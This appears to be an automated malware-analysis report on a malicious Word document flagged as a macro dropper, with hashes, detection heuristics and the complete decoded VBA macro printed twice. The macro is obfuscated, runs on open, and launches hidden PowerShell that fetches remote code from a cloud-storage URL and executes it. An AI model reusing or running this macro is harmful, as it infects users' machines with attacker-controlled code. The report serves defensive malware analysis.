Office (OLE) malware analysis — malicious · bf801a42e2689083

MALICIOUS

Office (OLE)

268.5 KB Created: 2018-03-02 16:12:00 Authoring application: Microsoft Office Word First seen: 2018-03-30

MD5: 1ff8a808b76beb0d7d61cbf95f26fbf5 SHA-1: 5b695faa50a39a1dd42add1784a103fe69e57d02 SHA-256: bf801a42e26890831780a7413d93268e456babf289cd21957f644cf14c0f226f

170 Risk Score

Heuristics 6

ClamAV: Doc.Dropper.Agent-6464062-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6464062-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA
Matched line in script
```
    CL_QJ = CL_QJ + CR_KI
    Shell$ CL_QJ
End Sub
```

AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro

Matched line in script

Attribute VB_Name = "module"
Sub AutoOpen()
    Dim CL_QJ As String

Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6263 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	6263 bytes
SHA-256: `56b0b579c8a4d36334539eba2c92712a0fde7742b9fd5f61d1cea3143b633a58`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "module" Sub AutoOpen() Dim CL_QJ As String IK_LD = Array("y", "a", "s", "l", "o", "p", "c", "i", "h", "x", "b", " ", "r", "u", "e", "d", "n", "-", "t", "w") Dim BT_TA As String BT_TA = "ZgB1AG4AYwB0AGkAbwBuACAAYQAoACQAeAApAHsAcg" CL_QJ = CL_QJ + IK_LD(5) CL_QJ = CL_QJ + IK_LD(4) Dim BL_PD As String BL_PD = "BlAHQAdQByAG4AIABbAFMAeQB" CL_QJ = CL_QJ + IK_LD(19) CL_QJ = CL_QJ + IK_LD(14) Dim DS_TJ As String DS_TJ = "zAHQAZQBtAC4AVABlAHgAdAA" CL_QJ = CL_QJ + IK_LD(12) CL_QJ = CL_QJ + IK_LD(2) Dim JQ_SA As String JQ_SA = "uAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4" CL_QJ = CL_QJ + IK_LD(8) CL_QJ = CL_QJ + IK_LD(14) Dim CR_LH As String CR_LH = "AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZ" CR_KI = CR_KI & BT_TA & BL_PD & DS_TJ & JQ_SA & CR_LH CL_QJ = CL_QJ + IK_LD(3) CL_QJ = CL_QJ + IK_LD(3) Dim FN_PA As String FN_PA = "QBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIA" CL_QJ = CL_QJ + IK_LD(11) CL_QJ = CL_QJ + IK_LD(17) Dim IK_QD As String IK_QD = "YQBzAGUANgA0AFMAdAByAGkAbgBnACgAJAB4ACkAKQB" CL_QJ = CL_QJ + IK_LD(19) CL_QJ = CL_QJ + IK_LD(7) Dim HR_RI As String HR_RI = "9ADsAaQBlAHgAIAAkAC" CL_QJ = CL_QJ + IK_LD(16) CL_QJ = CL_QJ + IK_LD(15) Dim BQ_RJ As String BQ_RJ = "gAYQAgACQAKAAkACgAJAA" CL_QJ = CL_QJ + IK_LD(4) CL_QJ = CL_QJ + IK_LD(19) Dim HO_TH As String HO_TH = "oAGkAbgB2A" CR_KI = CR_KI & FN_PA & IK_QD & HR_RI & BQ_RJ & HO_TH CL_QJ = CL_QJ + IK_LD(2) CL_QJ = CL_QJ + IK_LD(18) Dim DR_NH As String DR_NH = "G8AawBlAC0AdwBlAGIAcgBlAHEAdQBl" CL_QJ = CL_QJ + IK_LD(0) CL_QJ = CL_QJ + IK_LD(3) Dim BQ_LJ As String BQ_LJ = "AHMAdAAgACcAaAB0AHQAcAB" CL_QJ = CL_QJ + IK_LD(14) CL_QJ = CL_QJ + IK_LD(11) Dim CR_LJ As String CR_LJ = "zADoALwAvA" CL_QJ = CL_QJ + IK_LD(8) CL_QJ = CL_QJ + IK_LD(7) Dim HO_OG As String HO_OG = "HUAcwBwAHIAZAA1AD" CL_QJ = CL_QJ + IK_LD(15) CL_QJ = CL_QJ + IK_LD(15) Dim CQ_KI As String CQ_KI = "EANQAwAGMAZQBu" CR_KI = CR_KI & DR_NH & BQ_LJ & CR_LJ & HO_OG & CQ_KI CL_QJ = CL_QJ + IK_LD(14) CL_QJ = CL_QJ + IK_LD(16) Dim IS_QF As String IS_QF = "AHQAcgBhAGwALgB0AG" CL_QJ = CL_QJ + IK_LD(11) CL_QJ = CL_QJ + IK_LD(17) Dim EP_QG As String EP_QG = "EAYgBsAGUALgBj" CL_QJ = CL_QJ + IK_LD(14) CL_QJ = CL_QJ + IK_LD(9) Dim FN_KG As String FN_KG = "AG8AcgBlAC4" CL_QJ = CL_QJ + IK_LD(14) CL_QJ = CL_QJ + IK_LD(6) Dim DQ_OA As String DQ_OA = "AdwBpAG4AZABvAHcAcwAuAG4AZQB0AC8AdwBhAHIAZQBoAG8" CL_QJ = CL_QJ + IK_LD(13) CL_QJ = CL_QJ + IK_LD(18) Dim JN_SG As String JN_SG = "AdQBzAGUAPwAkAGYAaQBsAHQAZQByAD0AUABhAHIAdABpAHQA" CR_KI = CR_KI & IS_QF & EP_QG & FN_KG & DQ_OA & JN_SG CL_QJ = CL_QJ + IK_LD(7) CL_QJ = CL_QJ + IK_LD(4) Dim CT_KF As String CT_KF = "aQBvAG4ASwBlAHkAJQAyADAAZQBxACUAMgAwACU" CL_QJ = CL_QJ + IK_LD(16) CL_QJ = CL_QJ + IK_LD(5) Dim EO_SC As String EO_SC = "AMgA3AHM" CL_QJ = CL_QJ + IK_LD(4) CL_QJ = CL_QJ + IK_LD(3) Dim EP_SA As String EP_SA = "AdABhAGcAZQAlADIANwAmA" CL_QJ = CL_QJ + IK_LD(7) CL_QJ = CL_QJ + IK_LD(6) Dim DN_MH As String DN_MH = "CQAUwBlAGwAZ" CL_QJ = CL_QJ + IK_LD(0) CL_QJ = CL_QJ + IK_LD(11) Dim FP_TH As String FP_TH = "QBjAHQAPQBkAGEAdABhA" CR_KI = CR_KI & CT_KF & EO_SC & EP_SA & DN_MH & FP_TH CL_QJ = CL_QJ + IK_LD(10) CL_QJ = CL_QJ + IK_LD(0) Dim FT_OF As String FT_OF = "CYAcwB2AD0AMgAwADEANwAtA" CL_QJ = CL_QJ + IK_LD(5) CL_QJ = CL_QJ + IK_LD(1) Dim DO_LI As String DO_LI = "DAANAAtADEANwAmAHMAcwA9AGIAZgBx" CL_QJ = CL_QJ + IK_LD(2) CL_QJ = CL_QJ + IK_LD(2) Dim CK_SF As String CK_SF = "AHQAJgBzAHIAdAA" CL_QJ = CL_QJ + IK_LD(11) CL_QJ = CL_QJ + IK_LD(17) Dim AO_LA As String AO_LA = "9AHMAYwBvACYAcwBwAD0AcgB3AGQAbA" CL_QJ = CL_QJ + IK_LD(14) CL_QJ = CL_QJ + IK_LD(11) Dim CT_NJ As String CT_NJ = "BhAGMAdQBwACYAcwBlAD0AMgAwADE" CR_KI = CR_KI & FT_OF & DO_LI & CK_SF & AO_LA & CT_NJ Dim AP_KD As String AP_KD = "ANwAtADEAMAAtADAANgBUADIAMgA6ADQAMQA6ADEAMgBaACYA" Dim AL_NA As String AL_NA = "cwB0AD0A" Dim BR_TE As String BR_TE = "MgAwADEANw" Dim HS_KE As String HS_KE = "AtADAAOQAtADIAOAB" Dim GM_LA As String GM_LA = "UADEANAA6ADQAMQA6ADEAMgBaACYAcwBwAHIAPQ" CR_KI = CR_KI & AP_KD & AL_NA & BR_TE & HS_KE & GM_LA Dim CK_TI As String CK_TI = "BoAHQAdABw" Dim DL_PD As String DL_PD = "AHMAJgBzAGkA" Dim DP_SF As String DP_SF = "ZwA9AHQAegBQ" Dim CS_NA As String CS_NA = "ADcAYwA4AHgAWgBoA" Dim FM_OA As String FM_OA = "HIAMQBzAGIAdgB4ADkAZgBKAFMAdwBKAEkAUwBIAEIA" CR_KI = CR_KI & CK_TI & DL_PD & DP_SF & CS_NA & FM_OA Dim JT_OD As String JT_OD = "NgBlADgAJQAyAEIAbgBsAGwAdQ" Dim IO_SI As String IO_SI = "BuAEgAaQBmAEwAMwBoAHgAagA0ACUAMwBEACc" Dim BN_KF As String BN_KF = "AIAAtAEgAZQBhAGQAZQByAHMAIABAAHsA" Dim AN_SC As String AN_SC = "JwBBAGMAYwB" Dim JO_NJ As String JO_NJ = "lAHAAdAAnAD0AJwBBAHAAcABsAGkAYwB" CR_KI = CR_KI & JT_OD & IO_SI & BN_KF & AN_SC & JO_NJ Dim DO_NB As String DO_NB = "hAHQAaQBvAG4ALwBKAFMATwBOACcAfQApAC4AQwBvAG4AdABlA" Dim AM_NB As String AM_NB = "G4AdAAgAHw" Dim JT_TE As String JT_TE = "AIABDAG8AbgB2AGUAcgB0AEY" CR_KI = CR_KI & DO_NB & AM_NB & JT_TE Dim DN_RD As String DN_RD = "AcgBvAG0ALQBKAHMAbwBuACkALgB2AGEAbAB1AGUAL" CR_KI = CR_KI & DN_RD Dim CO_NF As String CO_NF = "gBkAGEAdABhACkAKQA=" CR_KI = CR_KI & CO_NF CL_QJ = CL_QJ + CR_KI Shell$ CL_QJ End Sub

SHA-256: 56b0b579c8a4d36334539eba2c92712a0fde7742b9fd5f61d1cea3143b633a58

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "module"
Sub AutoOpen()
    Dim CL_QJ As String
    IK_LD = Array("y", "a", "s", "l", "o", "p", "c", "i", "h", "x", "b", " ", "r", "u", "e", "d", "n", "-", "t", "w")
    Dim BT_TA As String
    BT_TA = "ZgB1AG4AYwB0AGkAbwBuACAAYQAoACQAeAApAHsAcg"
    CL_QJ = CL_QJ + IK_LD(5)
    CL_QJ = CL_QJ + IK_LD(4)
    Dim BL_PD As String
    BL_PD = "BlAHQAdQByAG4AIABbAFMAeQB"
    CL_QJ = CL_QJ + IK_LD(19)
    CL_QJ = CL_QJ + IK_LD(14)
    Dim DS_TJ As String
    DS_TJ = "zAHQAZQBtAC4AVABlAHgAdAA"
    CL_QJ = CL_QJ + IK_LD(12)
    CL_QJ = CL_QJ + IK_LD(2)
    Dim JQ_SA As String
    JQ_SA = "uAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4"
    CL_QJ = CL_QJ + IK_LD(8)
    CL_QJ = CL_QJ + IK_LD(14)
    Dim CR_LH As String
    CR_LH = "AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZ"
    CR_KI = CR_KI & BT_TA & BL_PD & DS_TJ & JQ_SA & CR_LH
    CL_QJ = CL_QJ + IK_LD(3)
    CL_QJ = CL_QJ + IK_LD(3)
    Dim FN_PA As String
    FN_PA = "QBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIA"
    CL_QJ = CL_QJ + IK_LD(11)
    CL_QJ = CL_QJ + IK_LD(17)
    Dim IK_QD As String
    IK_QD = "YQBzAGUANgA0AFMAdAByAGkAbgBnACgAJAB4ACkAKQB"
    CL_QJ = CL_QJ + IK_LD(19)
    CL_QJ = CL_QJ + IK_LD(7)
    Dim HR_RI As String
    HR_RI = "9ADsAaQBlAHgAIAAkAC"
    CL_QJ = CL_QJ + IK_LD(16)
    CL_QJ = CL_QJ + IK_LD(15)
    Dim BQ_RJ As String
    BQ_RJ = "gAYQAgACQAKAAkACgAJAA"
    CL_QJ = CL_QJ + IK_LD(4)
    CL_QJ = CL_QJ + IK_LD(19)
    Dim HO_TH As String
    HO_TH = "oAGkAbgB2A"
    CR_KI = CR_KI & FN_PA & IK_QD & HR_RI & BQ_RJ & HO_TH
    CL_QJ = CL_QJ + IK_LD(2)
    CL_QJ = CL_QJ + IK_LD(18)
    Dim DR_NH As String
    DR_NH = "G8AawBlAC0AdwBlAGIAcgBlAHEAdQBl"
    CL_QJ = CL_QJ + IK_LD(0)
    CL_QJ = CL_QJ + IK_LD(3)
    Dim BQ_LJ As String
    BQ_LJ = "AHMAdAAgACcAaAB0AHQAcAB"
    CL_QJ = CL_QJ + IK_LD(14)
    CL_QJ = CL_QJ + IK_LD(11)
    Dim CR_LJ As String
    CR_LJ = "zADoALwAvA"
    CL_QJ = CL_QJ + IK_LD(8)
    CL_QJ = CL_QJ + IK_LD(7)
    Dim HO_OG As String
    HO_OG = "HUAcwBwAHIAZAA1AD"
    CL_QJ = CL_QJ + IK_LD(15)
    CL_QJ = CL_QJ + IK_LD(15)
    Dim CQ_KI As String
    CQ_KI = "EANQAwAGMAZQBu"
    CR_KI = CR_KI & DR_NH & BQ_LJ & CR_LJ & HO_OG & CQ_KI
    CL_QJ = CL_QJ + IK_LD(14)
    CL_QJ = CL_QJ + IK_LD(16)
    Dim IS_QF As String
    IS_QF = "AHQAcgBhAGwALgB0AG"
    CL_QJ = CL_QJ + IK_LD(11)
    CL_QJ = CL_QJ + IK_LD(17)
    Dim EP_QG As String
    EP_QG = "EAYgBsAGUALgBj"
    CL_QJ = CL_QJ + IK_LD(14)
    CL_QJ = CL_QJ + IK_LD(9)
    Dim FN_KG As String
    FN_KG = "AG8AcgBlAC4"
    CL_QJ = CL_QJ + IK_LD(14)
    CL_QJ = CL_QJ + IK_LD(6)
    Dim DQ_OA As String
    DQ_OA = "AdwBpAG4AZABvAHcAcwAuAG4AZQB0AC8AdwBhAHIAZQBoAG8"
    CL_QJ = CL_QJ + IK_LD(13)
    CL_QJ = CL_QJ + IK_LD(18)
    Dim JN_SG As String
    JN_SG = "AdQBzAGUAPwAkAGYAaQBsAHQAZQByAD0AUABhAHIAdABpAHQA"
    CR_KI = CR_KI & IS_QF & EP_QG & FN_KG & DQ_OA & JN_SG
    CL_QJ = CL_QJ + IK_LD(7)
    CL_QJ = CL_QJ + IK_LD(4)
    Dim CT_KF As String
    CT_KF = "aQBvAG4ASwBlAHkAJQAyADAAZQBxACUAMgAwACU"
    CL_QJ = CL_QJ + IK_LD(16)
    CL_QJ = CL_QJ + IK_LD(5)
    Dim EO_SC As String
    EO_SC = "AMgA3AHM"
    CL_QJ = CL_QJ + IK_LD(4)
    CL_QJ = CL_QJ + IK_LD(3)
    Dim EP_SA As String
    EP_SA = "AdABhAGcAZQAlADIANwAmA"
    CL_QJ = CL_QJ + IK_LD(7)
    CL_QJ = CL_QJ + IK_LD(6)
    Dim DN_MH As String
    DN_MH = "CQAUwBlAGwAZ"
    CL_QJ = CL_QJ + IK_LD(0)
    CL_QJ = CL_QJ + IK_LD(11)
    Dim FP_TH As String
    FP_TH = "QBjAHQAPQBkAGEAdABhA"
    CR_KI = CR_KI & CT_KF & EO_SC & EP_SA & DN_MH & FP_TH
    CL_QJ = CL_QJ + IK_LD(10)
    CL_QJ = CL_QJ + IK_LD(0)
    Dim FT_OF As String
    FT_OF = "CYAcwB2AD0AMgAwADEANwAtA"
    CL_QJ = CL_QJ + IK_LD(5)
    CL_QJ = CL_QJ + IK_LD(1)
    Dim DO_LI As String
    DO_LI = "DAANAAtADEANwAmAHMAcwA9AGIAZgBx"
    CL_QJ = CL_QJ + IK_LD(2)
    CL_QJ = CL_QJ + IK_LD(2)
    Dim CK_SF As String
    CK_SF = "AHQAJgBzAHIAdAA"
    CL_QJ = CL_QJ + IK_LD(11)
    CL_QJ = CL_QJ + IK_LD(17)
    Dim AO_LA As String
    AO_LA = "9AHMAYwBvACYAcwBwAD0AcgB3AGQAbA"
    CL_QJ = CL_QJ + IK_LD(14)
    CL_QJ = CL_QJ + IK_LD(11)
    Dim CT_NJ As String
    CT_NJ = "BhAGMAdQBwACYAcwBlAD0AMgAwADE"
    CR_KI = CR_KI & FT_OF & DO_LI & CK_SF & AO_LA & CT_NJ
    Dim AP_KD As String
    AP_KD = "ANwAtADEAMAAtADAANgBUADIAMgA6ADQAMQA6ADEAMgBaACYA"
    Dim AL_NA As String
    AL_NA = "cwB0AD0A"
    Dim BR_TE As String
    BR_TE = "MgAwADEANw"
    Dim HS_KE As String
    HS_KE = "AtADAAOQAtADIAOAB"
    Dim GM_LA As String
    GM_LA = "UADEANAA6ADQAMQA6ADEAMgBaACYAcwBwAHIAPQ"
    CR_KI = CR_KI & AP_KD & AL_NA & BR_TE & HS_KE & GM_LA
    Dim CK_TI As String
    CK_TI = "BoAHQAdABw"
    Dim DL_PD As String
    DL_PD = "AHMAJgBzAGkA"
    Dim DP_SF As String
    DP_SF = "ZwA9AHQAegBQ"
    Dim CS_NA As String
    CS_NA = "ADcAYwA4AHgAWgBoA"
    Dim FM_OA As String
    FM_OA = "HIAMQBzAGIAdgB4ADkAZgBKAFMAdwBKAEkAUwBIAEIA"
    CR_KI = CR_KI & CK_TI & DL_PD & DP_SF & CS_NA & FM_OA
    Dim JT_OD As String
    JT_OD = "NgBlADgAJQAyAEIAbgBsAGwAdQ"
    Dim IO_SI As String
    IO_SI = "BuAEgAaQBmAEwAMwBoAHgAagA0ACUAMwBEACc"
    Dim BN_KF As String
    BN_KF = "AIAAtAEgAZQBhAGQAZQByAHMAIABAAHsA"
    Dim AN_SC As String
    AN_SC = "JwBBAGMAYwB"
    Dim JO_NJ As String
    JO_NJ = "lAHAAdAAnAD0AJwBBAHAAcABsAGkAYwB"
    CR_KI = CR_KI & JT_OD & IO_SI & BN_KF & AN_SC & JO_NJ
    Dim DO_NB As String
    DO_NB = "hAHQAaQBvAG4ALwBKAFMATwBOACcAfQApAC4AQwBvAG4AdABlA"
    Dim AM_NB As String
    AM_NB = "G4AdAAgAHw"
    Dim JT_TE As String
    JT_TE = "AIABDAG8AbgB2AGUAcgB0AEY"
    CR_KI = CR_KI & DO_NB & AM_NB & JT_TE
    Dim DN_RD As String
    DN_RD = "AcgBvAG0ALQBKAHMAbwBuACkALgB2AGEAbAB1AGUAL"
    CR_KI = CR_KI & DN_RD
    Dim CO_NF As String
    CO_NF = "gBkAGEAdABhACkAKQA="
    CR_KI = CR_KI & CO_NF
    CL_QJ = CL_QJ + CR_KI
    Shell$ CL_QJ
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.